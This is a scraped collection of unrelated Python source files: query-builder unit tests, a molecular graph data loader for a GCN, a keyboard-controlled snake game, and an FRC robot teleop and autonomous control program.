self.assertRaises(InvalidPropertyError):\n q.orderby('invalidproperty', 'ASC')\n\n def test_orderby_invalid_label(self):\n \"\"\"Test that orderby raises InvalidLabelError\"\"\"\n q = Query('Environment')\n with self.assertRaises(InvalidLabelError):\n q.orderby('aproperty', 'DESC', label='invalidlabel')\n\n def test_orderby_multiple(self):\n \"\"\"Test multiple orderby statements.\"\"\"\n q = Query('Environment')\n q.orderby('account_number', 'ASC', label='Environment')\n q.orderby('name', 'DESC', label='Environment')\n expected = (\n \"ORDER BY environment.account_number ASC, \"\n \"environment.name DESC\"\n )\n self.assertTrue(expected in str(q))\n\n def test_orderby_state_property(self):\n \"\"\"Test orderby on a state property.\"\"\"\n q = Query('Host')\n q.orderby('kernel', 'DESC', label='Host')\n expected = 'ORDER BY host_state.kernel DESC'\n self.assertTrue(expected in str(q))\n\n def test_limit_none(self):\n \"\"\"Test query where no limit has been set.\"\"\"\n q = Query('Environment')\n self.assertFalse('LIMIT' in str(q))\n\n def test_limit(self):\n \"\"\"Test query where a limit as been set.\"\"\"\n q = Query('Environment')\n q.limit(5)\n q.limit(10)\n self.assertTrue('LIMIT 10' in str(q))\n\n def test_skip_none(self):\n \"\"\"Test query where no skip has been set.\"\"\"\n q = Query('Environment')\n self.assertFalse('SKIP' in str(q))\n\n def test_skip(self):\n \"\"\"Test query where skip has been set.\"\"\"\n q = Query('Environment')\n q.skip(5)\n q.skip(10)\n self.assertTrue('SKIP 10' in str(q))\n\n def test_filter_without_label(self):\n \"\"\"Test filtering using default label.\"\"\"\n q = Query('Host')\n q.filter('hostname', '=', 'somehostname')\n expected = 'WHERE host.hostname = $filterval0'\n self.assertTrue(expected in str(q))\n self.assertEquals(q.params['filterval0'], 'somehostname')\n\n def test_filter_with_label(self):\n \"\"\"Test filtering with a non default label.\"\"\"\n q = Query('Host')\n q.filter('account_number', '=', 'somenumber', label='Environment')\n expected = 'WHERE environment.account_number = $filterval0'\n self.assertTrue(expected in str(q))\n\n def 
test_filter_invalid_label(self):\n \"\"\"Test filtering with invalid label.\"\"\"\n q = Query('Host')\n with self.assertRaises(InvalidLabelError):\n q.filter('someprop', 'someop', 'someval', label='InvalidLabel')\n\n def test_filter_invalid_prop(self):\n \"\"\"Test filtering with invalid property.\"\"\"\n q = Query('Host')\n with self.assertRaises(InvalidPropertyError):\n q.filter('someinvalidprop', 'someop', 'someval')\n\n def test_multiple_filters(self):\n \"\"\"Tests more than one filters.\"\"\"\n q = Query('Host')\n q.filter('hostname', '=', 'somehostname')\n q.filter('kernel', '=', 'somekernel')\n expected = (\n 'WHERE host.hostname = $filterval0 AND '\n 'host_state.kernel = $filterval1'\n )\n self.assertTrue(expected in str(q))\n\n def test_rel_filters(self):\n \"\"\"Test adding time filters on relationships.\"\"\"\n q = Query('Virtualenv')\n expected = (\n \"r0.from <= $time < r0.to AND r1.from <= $time < r1.to \"\n \"AND r_host_state.from <= $time < r_host_state.to\"\n )\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_count(self, m_connection):\n \"\"\"Tests counting number of results.\"\"\"\n data = FakeRecords()\n data.append({'total': 13})\n data = [data]\n m_connection.return_value = FakeConnection(data)\n q = Query('Environment')\n self.assertEquals(q.count(), 13)\n\n @mock.patch('api.query.Query.fetch')\n def test_page_defaults(self, m_fetch):\n \"\"\"Test default arguments to page() method.\"\"\"\n q = Query('Environment')\n q.page()\n\n expected = 'SKIP 0'\n self.assertTrue(expected in str(q))\n expected = 'LIMIT 100'\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_page_with_page(self, m_fetch):\n \"\"\"Test providing page with a page and a size.\"\"\"\n q = Query('Environment')\n q.page(page=3, pagesize=500)\n expected = \"SKIP 1000\"\n self.assertTrue(expected in str(q))\n expected = \"LIMIT 500\"\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_page_with_index(self, m_fetch):\n \"\"\"Test providing page an index and a size.\"\"\"\n q = Query('Environment')\n q.page(index=3, pagesize=500)\n expected = \"SKIP 2\"\n self.assertTrue(expected in str(q))\n expected = \"LIMIT 500\"\n self.assertTrue(expected in str(q))\n\n @mock.patch('api.query.get_connection')\n def test_page_with_negative_index(self, m_fetch):\n \"\"\"Test providing page with a negative index and a size.\"\"\"\n q = Query('Environment')\n q.page(index=-10, pagesize=500)\n expected = \"SKIP 0\"\n self.assertTrue(expected in str(q))\n expected = \"LIMIT 500\"\n self.assertTrue(expected in str(q))\n\n\nclass TestTimesQuery(TestCase):\n\n def test_query_str_and_params(self):\n label = 'Environment'\n id_ = 'someid'\n expected = (\n \"MATCH p = (environment:Environment)-[*]->(other)\"\n \"\\nWHERE environment.account_number_name = $identity\"\n \"\\nWITH relationships(p) as rels\"\n \"\\nUNWIND rels as r\"\n \"\\nreturn DISTINCT r.from as t\"\n \"\\nORDER BY t DESC\"\n )\n q = TimesQuery(label, id_)\n self.assertEquals(str(q), expected)\n self.assertEquals(q.params['identity'], id_)\n\n @mock.patch('api.query.get_connection')\n def test_fetch(self, m_connection):\n data = [[{'t': 1}, {'t': 2}, {'t': 3}]]\n m_connection.return_value = FakeConnection(data)\n q = TimesQuery('Environment', 'someid')\n self.assertListEqual([1, 2, 3], q.fetch())\n\n data = [[]]\n m_connection.return_value = FakeConnection(data)\n self.assertListEqual([], 
q.fetch())\n","repo_name":"absalon-james/cloud_snitch","sub_path":"web/api/tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23462205667","text":"import pysmiles as psm\nimport networkx as nx\nimport numpy as np\nimport os\nimport torch\n\n'''\ndata\n化学式数目:8169\n化学式最长长度(element个数):132\n特征矩阵维度:4\n特征:\nelement: need a static dict to stand for each element\naromatic: 直接用\nhcount: 直接用\ncharge: 非常稀疏,偶尔有个-1之类的,可以考虑不用\nisotope& class 两个装死\n特征扩展:主要目的是补齐空缺位置,这个是必须的,不然会报错\n目前:feature 0扩展,维度为(4,132)\nadj 先0扩展再进行计算,维度为(132,132)\n方案1:adj矩阵扩展为0,feature矩阵也扩展为0\n方案2:读一读adj来源图,考虑一下扩展成-1?之类的,或者对角线-1?\n feature矩阵考虑扩展成-1?但是需要注意charge的-1,扩展可能不太一样\nsmile CC=CCC#N\nelement: [(0, 'C'), (1, 'C'), (2, 'C'), (3, 'C'), (4, 'C'), (5, 'N')]\naromatic: [(0, False), (1, False), (2, False), (3, False), (4, False), (5, False)]\nisotope: [(0, None), (1, None), (2, None), (3, None), (4, None), (5, None)]\nhcount: [(0, 3), (1, 1), (2, 1), (3, 2), (4, 0), (5, 0)]\ncharge: [(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (5, 0)]\nclass: [(0, None), (1, None), (2, None), (3, None), (4, None), (5, None)]\nadj_h:\n [[0.5 0.5 0. 0. 0. 0. ]\n [0.25 0.25 0.5 0. 0. 0. ]\n [0. 0.5 0.25 0.25 0. 0. ]\n [0. 0. 0.33333333 0.33333333 0.33333333 0. ]\n [0. 0. 0. 0.2 0.2 0.6 ]\n [0. 0. 0. 0. 0.75 0.25 ]]\n'''\n\n'''\nQuestion:\nthe expanded feature array is too sparce\n'''\n\ndict_element = {'C': 1, 'N': 2, 'O': 3, 'Br': 4, 'Cl': 5, 'Na': 6, 'S': 7, 'P': 8, 'Ca': 9, 'F': 10, 'B': 11, 'H': 12,\n 'As': 13, 'Al': 14, 'I': 15, 'Si': 16, 'K': 17, 'Cr': 18, 'Zn': 19, 'Se': 20, 'Zr': 21, 'Fe': 22,\n 'Sn': 23, 'Nd': 24, 'Cu': 25, 'Au': 26, 'Pb': 27, 'Tl': 28, 'Sb': 29, 'Cd': 30, 'Pd': 31, 'Ti': 32,\n 'Pt': 33, 'In': 34, 'Ba': 35, 'Ag': 36, 'Dy': 37, 'Hg': 38, 'Li': 39, 'Yb': 40, 'Mn': 41, 'Mg': 42,\n 'Co': 43, 'Ni': 44, 'Be': 45, 'Ge': 46, 'Bi': 47, 'V': 48, 'Sr': 49, 'Mo': 50, 'Ru': 51, 'Eu': 52,\n 'Sc': 53}\n# from test\nMaximum_length_smile = 132\n# Maximum_length = 0\ntmpnum_smiles = 10000\n\ndef fread_smiles(path):\n with open(path, 'r') as f:\n dts = f.read().split('\\n')[1:]\n\n names_to_smiles = {}\n for dt in dts:\n if dt == '':\n continue\n data = dt.split(',')\n names_to_smiles[data[0]] = data[1]\n\n return names_to_smiles\n\ndef fread_labels(path):\n file = open(path, 'r').read()\n data_list = file.split('\\n')[1:]\n return_dict = {}\n for data in data_list:\n if data:\n list_d = data.split(',')\n return_dict[list_d[0]] = int(list_d[1])\n\n return return_dict\n\ndef proc_one_smile(smile_nx):\n element = smile_nx.nodes(data='element')\n isotope = smile_nx.nodes(data='isotope')\n aromatic = smile_nx.nodes(data='aromatic')\n hcount = smile_nx.nodes(data='hcount')\n charge = smile_nx.nodes(data='charge')\n _class = smile_nx.nodes(data='class')\n \n feature = []\n fet_element = []\n fet_aromatic = []\n fet_hcount = []\n fet_charge = []\n for i in element:\n fet_element.append(dict_element[i[1]])\n for i in aromatic:\n if i[1]:\n fet_aromatic.append(1)\n else:\n fet_aromatic.append(0)\n for i in hcount:\n fet_hcount.append(i[1])\n for i in charge:\n fet_charge.append(i[1])\n feature.append(fet_element)\n feature.append(fet_aromatic)\n feature.append(fet_hcount)\n feature.append(fet_charge)\n feature = np.array(feature)\n\n # print(feature.shape)\n # print(feature)\n\n global Maximum_length_smile\n tmp = int(Maximum_length_smile - feature.shape[1])\n expand_feature = np.zeros((4,tmp))\n feature = 
np.concatenate((feature,expand_feature),axis = 1)\n feature = feature.transpose()\n\n # print(feature.shape)\n # print(feature)\n # print(expand_feature.shape)\n # print(expand_feature)\n # print()\n\n # global Maximum_length\n # if feature.shape[1] > Maximum_length :\n # Maximum_length = feature.shape[1]\n\n # print(feature.shape)\n # print(feature) \n # print('element:',type(element),element)\n # print('aromatic:',type(aromatic),aromatic)\n # print('isotope:',type(isotope),isotope)\n # print('hcount:',type(hcount),hcount)\n # print('charge:',type(charge),charge)\n # print('class:',type(_class),_class)\n\n adj = nx.to_numpy_matrix(smile_nx,weight='order')\n # print(adj.shape)\n \n # print(adj.shape)\n # print(adj)\n # print('adj:',type(adj),'\\n',adj)\n\n adj = adj+np.eye(adj.shape[0])\n # print('adj:',type(adj),'\\n',adj)\n\n sum_ = np.array(np.sum(adj, axis=0)).flatten()\n # print('sum_:',type(sum_),'\\n',sum_)\n row_sum = np.power(np.diag(sum_), -1)\n # print('row_sum:',type(row_sum),'\\n',row_sum)\n row_sum[np.isinf(row_sum)] = 0\n # print('row_sum:',type(row_sum),'\\n',row_sum)\n adj = np.dot(row_sum, adj)\n # print('adj_h:',type(adj_h),'\\n',adj_h)\n\n expand_feature = np.zeros((adj.shape[0],Maximum_length_smile-adj.shape[1]))\n adj = np.concatenate((adj,expand_feature),axis = 1)\n expand_feature = np.zeros((Maximum_length_smile-adj.shape[0],adj.shape[1]))\n adj = np.concatenate((adj,expand_feature),axis = 0)\n\n return adj, feature\n \n\ndef load_data():\n ffolder_train = \"../data/train/\"\n\n fname_smiles = \"names_smiles.txt\"\n fname_onehot = \"names_onehots.npy\"\n fname_label = \"names_labels.txt\"\n\n dict_id_smiles = fread_smiles(ffolder_train+fname_smiles)\n # print(dict_id_smiles)\n smiles = []# smile string, for debug\n id = []# chemical id\n mol_smiles = []# debug\n adj_smiles = []#adjacent\n feature_smiles = []#feature\n allinput = []\n tmpi = 0\n for k in dict_id_smiles:\n # print('smile',dict_id_smiles[k])\n smiles.append(dict_id_smiles[k])\n id.append(k)\n mol_smiles.append(psm.read_smiles(dict_id_smiles[k]))\n tmpadj,tmpfet = proc_one_smile(psm.read_smiles(dict_id_smiles[k]))\n adj_smiles.append(tmpadj)\n feature_smiles.append(tmpfet)\n cat = np.concatenate((tmpadj,tmpfet),axis=1)\n allinput.append(cat)\n tmpi+=1\n if tmpi >= tmpnum_smiles:\n break\n # break\n \n dict_id_label = fread_labels(ffolder_train+fname_label)\n label_list = []\n tmpi = 0\n for k in dict_id_label:\n label_list.append(dict_id_label[k])\n tmpi+=1\n if tmpi >= tmpnum_smiles:\n break\n label_list = np.array(label_list)\n adj_smiles = torch.FloatTensor(np.array(adj_smiles))\n feature_smiles = torch.FloatTensor(np.array(feature_smiles))\n allinput = torch.FloatTensor(np.array(allinput))\n labels = torch.FloatTensor(np.expand_dims(label_list,1))\n print(adj_smiles.shape)\n print(feature_smiles.shape)\n print(labels.shape)\n print(allinput.shape)\n '''\n torch.Size([8169, 132, 132])\n torch.Size([8169, 4, 132])\n torch.Size([8169])\n torch.Size([32, 136, 132])\n '''\n print(feature_smiles.shape[2])\n print(labels.max().item() + 1)\n return id,labels,adj_smiles,feature_smiles,allinput\n\n# load_data()\n'''\ntest data: 610条\n'''\n\ndef load_test_data():\n ffolder_train = \"../data/test/\"\n\n fname_smiles = \"names_smiles.txt\"\n fname_onehot = \"names_onehots.npy\"\n # fname_label = \"names_labels.txt\"\n\n dict_id_smiles = fread_smiles(ffolder_train+fname_smiles)\n # print(dict_id_smiles)\n smiles = []# smile string, for debug\n id = []# chemical id\n mol_smiles = []# debug\n adj_smiles = 
[]#adjacent\n feature_smiles = []#feature\n allinput = []\n tmpi = 0\n for k in dict_id_smiles:\n # print('smile',dict_id_smiles[k])\n smiles.append(dict_id_smiles[k])\n id.append(k)\n mol_smiles.append(psm.read_smiles(dict_id_smiles[k]))\n tmpadj,tmpfet = proc_one_smile(psm.read_smiles(dict_id_smiles[k]))\n adj_smiles.append(tmpadj)\n feature_smiles.append(tmpfet)\n cat = np.concatenate((tmpadj,tmpfet),axis=1)\n allinput.append(cat)\n tmpi+=1\n if tmpi >= tmpnum_smiles:\n break\n # break\n \n adj_smiles = torch.FloatTensor(np.array(adj_smiles))\n feature_smiles = torch.FloatTensor(np.array(feature_smiles))\n allinput = torch.FloatTensor(np.array(allinput))\n print(adj_smiles.shape)\n print(feature_smiles.shape)\n print(allinput.shape)\n \n print(feature_smiles.shape[2])\n return id,adj_smiles,feature_smiles,allinput\n\n# load_test_data()\n\ndef accu(output,l):\n finalact = torch.nn.Sigmoid()\n v = finalact(output)[0].item()\n if l == 1:\n return l-v\n else:\n return v","repo_name":"LittleQili/Toy-GCN","sub_path":"dataproc.py","file_name":"dataproc.py","file_ext":"py","file_size_in_byte":8946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31297973918","text":"from settings import *\nfrom functions import *\nfrom zmeya import Snake\nfrom apple import Apple\nfrom time import sleep\nimport keyboard as kb\nimport msvcrt as m\nimport os\n\nfrom random import choice as chs\nfrom random import randint as rnd\n\nsettings = Settings()\n\nsettings.cells_st = draw_field(\n settings.dwr, settings.cell_size, settings.window_size)\nsettings.cells_num = [len(settings.cells_st[0]), len(settings.cells_st[1])]\n\narr = [Snake(settings) for k in range(30)]\n\napples = [Apple(settings, arr)]\n\n\ndef snake_left():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"W\")\n\n\ndef snake_up():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"N\")\n\n\ndef snake_right():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"E\")\n\n\ndef snake_down():\n if settings.manual_control:\n for snake in arr:\n snake.change_direct(\"S\")\n\n\nkb.add_hotkey('left', snake_left)\nkb.add_hotkey('up', snake_up)\nkb.add_hotkey('right', snake_right)\nkb.add_hotkey('down', snake_down)\n\ncounter = 0\nmax_score = 0\nwhile True:\n counter += 1\n\n for snake in arr:\n if snake.score > max_score:\n max_score = snake.score\n if snake.update(arr, snake):\n arr.remove(snake)\n break\n\n for apple in apples:\n if snake.check_apple_eating(apple):\n snake.inc_tail()\n\n apple.dwr.clear()\n\n apples.remove(apple)\n apples.append(Apple(settings, arr))\n\n snake.draw()\n snake.brain(apples, arr)\n\n if rnd(1, 15) == 3:\n apples.append(Apple(settings, arr))\n\n if rnd(1, 10) == 3 and not settings.manual_control:\n snake.change_direct(chs([\"N\", \"E\", \"S\", \"W\"]))\n\n for apple in apples:\n apple.draw()\n tt.update()\n\n if counter % 10 == 0:\n os.system(\"cls\")\n print(\"\\nSnake num: \", len(arr), \"\\nMax Score: \", max_score)\n counter = 0\n\n sleep(0.05)\n # m.getch()\n\n\ntt.mainloop()\n","repo_name":"TAPAKAHOKOT/Snake-with-stupid-Brain","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4971968744","text":"import wpilib\nimport ctre\nfrom wpilib import interfaces\n\nclass MyRobot(wpilib.TimedRobot):\n def robotInit(self):\n # compressor = 
wpilib.Compressor(wpilib.PneumaticsModuleType.CTREPCM)\n # compressor.disable()\n\n\n self.back_left = ctre.WPI_TalonFX(0) \n self.front_left = ctre.WPI_TalonFX(1)\n self.front_right = ctre.WPI_TalonFX(2) \n self.back_right = ctre.WPI_TalonFX(3)\n self.shooter_top = ctre.WPI_TalonFX(6)\n self.shooter_bottom = ctre.WPI_TalonFX(7)\n self.shooter_angle_1 = ctre.WPI_TalonSRX(10)\n self.shooter_angle_2 = ctre.WPI_TalonSRX(11) \n self.intake = ctre.WPI_TalonFX(12)\n\n \n self.front_left.setNeutralMode(ctre.NeutralMode.Brake)\n self.front_right.setNeutralMode(ctre.NeutralMode.Brake)\n self.back_left.setNeutralMode(ctre.NeutralMode.Brake)\n self.back_right.setNeutralMode(ctre.NeutralMode.Brake)\n self.front_right.setInverted(True)\n self.back_right.setInverted(True)\n self.shooter_top.setInverted(True)\n self.shooter_angle_1.setInverted(True)\n self.shooter_angle_2.setInverted(True)\n\n #solenoids:\n self.shooter_solenoid = wpilib.DoubleSolenoid(wpilib.PneumaticsModuleType.CTREPCM, forwardChannel = 0, reverseChannel = 1)\n self.shooter_solenoid_timer = wpilib.Timer()\n \n self.climber_solenoid = wpilib.DoubleSolenoid(wpilib.PneumaticsModuleType.CTREPCM, forwardChannel = 4, reverseChannel = 5)\n self.climber_solenoid_previous_position = wpilib.DoubleSolenoid.Value.kReverse\n self.climber_solenoid_timer = wpilib.Timer()\n\n self.intake_solenoid = wpilib.DoubleSolenoid(wpilib.PneumaticsModuleType.CTREPCM, forwardChannel = 2, reverseChannel = 3)\n self.intake_solenoid_previous_position = wpilib.DoubleSolenoid.Value.kForward\n self.intake_solenoid_timer = wpilib.Timer()\n\n #motor controller groups\n self.shooter_angle = wpilib.MotorControllerGroup(self.shooter_angle_1, self.shooter_angle_2)\n self.shooter = wpilib.MotorControllerGroup(self.shooter_top, self.shooter_bottom)\n\n #controller variables\n self.controller = wpilib.XboxController(0)\n self.controllerHID = interfaces.GenericHID(0)\n \n #speed/safety variables\n self.drive_speed = .7\n self.shooter_angle_speed = 1\n self.shooter_speed = .35\n self.is_birb_activated = True\n\n #other variables\n self.hub_shooting = [False, False] #[isHubShooting, isMovingToCorrectAngle]\n self.hub_shooting_timer = wpilib.Timer()\n\n # self.limit_switch = wpilib.DigitalInput(0)\n self.potentiometer = wpilib.AnalogInput(0) #0 degrees: 3512, 90 degrees: 3850\n\n #motor dictionary: (now in robotInit for function support)\n target_position = 0\n motor_position = 0\n previous_position = 0\n\n self.motor_dictionary = {\n \"front_right\": {\n \"motor\": self.front_right,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"front_left\": {\n \"motor\": self.front_left,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n\n },\n \"back_right\": {\n \"motor\": self.back_right,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"back_left\": {\n \"motor\": self.back_left,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"intake\": {\n \"motor\": self.intake,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"shooter_angle\": {\n \"motor\": self.shooter_angle,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n \"shooter\": {\n \"motor\": 
self.shooter,\n \"target_position\": target_position,\n \"position\": motor_position,\n \"previous_position\" : previous_position,\n },\n }\n\n def teleopPeriodic(self):\n #driving\n if abs(self.controller.getLeftY()) > .3 or abs(self.controller.getLeftX()) > .3 or abs(self.controller.getRightX()) > .3:\n self.front_right.set((-self.controller.getLeftY() - self.controller.getLeftX() - self.controller.getRightX()) * self.drive_speed)\n self.front_left.set((-self.controller.getLeftY() + self.controller.getLeftX() + self.controller.getRightX()) * self.drive_speed)\n self.back_left.set((-self.controller.getLeftY() - self.controller.getLeftX() + self.controller.getRightX()) * self.drive_speed)\n self.back_right.set((-self.controller.getLeftY() + self.controller.getLeftX() - self.controller.getRightX()) * self.drive_speed)\n else:\n self.front_right.set(0)\n self.front_left.set(0)\n self.back_right.set(0)\n self.back_left.set(0)\n \n # if self.controller.getYButtonPressed():\n # if self.drive_speed == 1:\n # self.drive_speed = .4\n # print(\"slow mode\")\n # else:\n # self.drive_speed = 1\n # print(\"FAST MODE\")\n \n\n #shooter angle\n if not self.hub_shooting[0]:\n if self.controller.getRightBumper():\n self.shooter_angle.set(self.shooter_angle_speed)\n elif self.controller.getLeftBumper():\n self.shooter_angle.set(-self.shooter_angle_speed)\n else:\n self.shooter_angle.set(0)\n\n #shooter/intake\n if not self.hub_shooting[0]:\n if self.controller.getRightTriggerAxis() > self.controller.getLeftTriggerAxis():\n self.shooter.set(self.controller.getRightTriggerAxis() * self.shooter_speed)\n self.intake.set(self.controller.getRightTriggerAxis() * self.shooter_speed)\n\n if self.controller.getRightTriggerAxis() < self.controller.getLeftTriggerAxis():\n self.intake.set(self.controller.getLeftTriggerAxis() * -.5)\n self.shooter.set(self.controller.getLeftTriggerAxis() * -.5)\n\n if self.controller.getRightTriggerAxis() == self.controller.getLeftTriggerAxis():\n self.intake.set(0)\n self.shooter_bottom.set(0)\n self.shooter_top.set(0)\n\n #solenoids:\n if self.controller.getAButtonPressed():\n self.shooter_solenoid_timer.start()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n if self.shooter_solenoid_timer.hasElapsed(.1) and self.shooter_solenoid_timer.get() < .2:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n if self.shooter_solenoid_timer.hasElapsed(.5) and self.shooter_solenoid_timer.get() < .55:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n if self.shooter_solenoid_timer.hasElapsed(.6) and self.shooter_solenoid_timer.get() < .7:\n self.shooter_solenoid_timer.stop()\n self.shooter_solenoid_timer.reset()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n if self.controller.getBButtonPressed() and self.is_birb_activated:\n self.climber_solenoid_timer.start()\n if self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse\n if self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n self.climber_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward\n if self.climber_solenoid_timer.hasElapsed(.25):\n self.climber_solenoid_timer.stop()\n self.climber_solenoid_timer.reset()\n self.climber_solenoid_previous_position = self.climber_solenoid.get()\n 
self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n if self.controller.getStartButtonPressed():\n self.intake_solenoid_timer.start()\n if self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse\n if self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kReverse:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n self.intake_solenoid_previous_position == wpilib.DoubleSolenoid.Value.kForward\n if self.intake_solenoid_timer.hasElapsed(.25):\n self.intake_solenoid_timer.stop()\n self.intake_solenoid_timer.reset()\n self.intake_solenoid_previous_position = self.intake_solenoid.get()\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n #auto angling/hub shooting\n # print((self.potentiometer.getValue() - 2554) * (90/448))\n\n if self.controller.getXButtonPressed():\n self.hub_shooting = [True, True]\n\n if self.hub_shooting[0]:\n if self.hub_shooting[1]:\n if ((self.potentiometer.getValue() - 2554) * (90/448)) < 55:\n self.shooter_angle.set(1)\n elif ((self.potentiometer.getValue() - 2554) * (90/448)) > 60:\n self.shooter_angle.set(-1)\n else:\n self.shooter_angle.set(0)\n self.hub_shooting_timer.start()\n self.hub_shooting[1] = False\n self.shooter.set(.3)\n\n if self.hub_shooting_timer.hasElapsed(1) and self.hub_shooting_timer.get() < 1.1:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n elif self.hub_shooting_timer.hasElapsed(1.25) and self.hub_shooting_timer.get() < 1.35:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n elif self.hub_shooting_timer.hasElapsed(1.75) and self.hub_shooting_timer.get() < 1.85:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n elif self.hub_shooting_timer.hasElapsed(2) and self.hub_shooting_timer.get() < 2.1:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n elif self.hub_shooting_timer.hasElapsed(2.75) and self.hub_shooting_timer.get() < 2.8:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n elif self.hub_shooting_timer.hasElapsed(2.85) and self.hub_shooting_timer.get() < 2.95:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n elif self.hub_shooting_timer.hasElapsed(2.25) and self.hub_shooting_timer.get() < 2.3:\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n elif self.hub_shooting_timer.hasElapsed(2.35) and self.hub_shooting_timer.get() < 2.45:\n self.hub_shooting_timer.reset()\n self.hub_shooting_timer.stop()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n self.shooter.set(0)\n self.shooter_angle.set(-1)\n if ((self.potentiometer.getValue() - 2554) * (90/448)) < -5 and not self.hub_shooting[1]:\n self.shooter_angle.set(0)\n self.hub_shooting[0] = False\n\n # print(self.hub_shooting_timer.get())\n\n if self.controller.getBackButtonPressed():\n self.shooter.set(0)\n self.shooter_angle.set(0)\n self.hub_shooting[0] = False\n self.hub_shooting_timer.stop()\n self.hub_shooting_timer.reset()\n self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n\n def autonomousInit(self):\n self.timer = wpilib.Timer()\n self.timer.start()\n self.autonomous_shooting = False\n # #Initial motor values\n self.front_right.set(-.3)\n self.front_left.set(-.3)\n self.back_right.set(-.3)\n self.back_left.set(-.3)\n\n # #intake ejection\n self.intake_solenoid_timer.start()\n self.climber_solenoid_timer.start()\n\n def 
autonomousPeriodic(self):\n print(self.timer.get())\n #solenoid defaults\n if self.intake_solenoid_timer.get() > 10 and self.intake_solenoid_timer.get() < 10.1:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n if self.climber_solenoid_timer.get() > 10 and self.climber_solenoid_timer.get() < 10.1:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n if self.intake_solenoid_timer.get() > 10.25 and self.intake_solenoid_timer.get() < 10.35:\n self.intake_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n self.intake_solenoid_timer.stop()\n self.intake_solenoid_timer.reset()\n if self.climber_solenoid_timer.get() > 10.25 and self.climber_solenoid_timer.get() < 10.35:\n self.climber_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n self.climber_solenoid_timer.stop()\n self.climber_solenoid_timer.reset()\n\n if self.timer.hasElapsed(2):\n self.front_right.set(0)\n self.front_left.set(0)\n self.back_right.set(0)\n self.back_left.set(0)\n # self.autonomous_shooting = True\n # self.timer.reset()\n # if self.autonomous_shooting:\n # if ((self.potentiometer.getValue() - 2554) * (90/448)) < 60:\n # self.shooter_angle.set(1)\n # elif ((self.potentiometer.getValue() - 2554) * (90/448)) > 65:\n # self.shooter_angle.set(-1)\n # else:\n # self.shooter_angle.set(0)\n # self.shooter.setVoltage(5.7)\n # self.timer.start()\n # if self.timer.hasElapsed(1):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kForward)\n # if self.timer.hasElapsed(1.25):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # if self.timer.hasElapsed(1.75):\n # self.shooter.set(0)\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kReverse)\n # if self.timer.hasElapsed(2):\n # self.autonomous_shooting = False\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # self.front_right.set(-.2)\n # self.front_left.set(-.2)\n # self.back_right.set(-.2)\n # self.back_left.set(-.2)\n # if self.timer.hasElapsed(3):\n # self.front_right.set(0)\n # self.front_left.set(0)\n # self.back_right.set(0)\n # self.back_left.set(0)\n # self.timer.stop()\n # self.timer.reset()\n # if self.timer.hasElapsed(2.25):\n # self.shooter_solenoid.set(wpilib.DoubleSolenoid.Value.kOff)\n # self.shooter.set(0)\n # if self.timer.hasElapsed(2.75):\n # 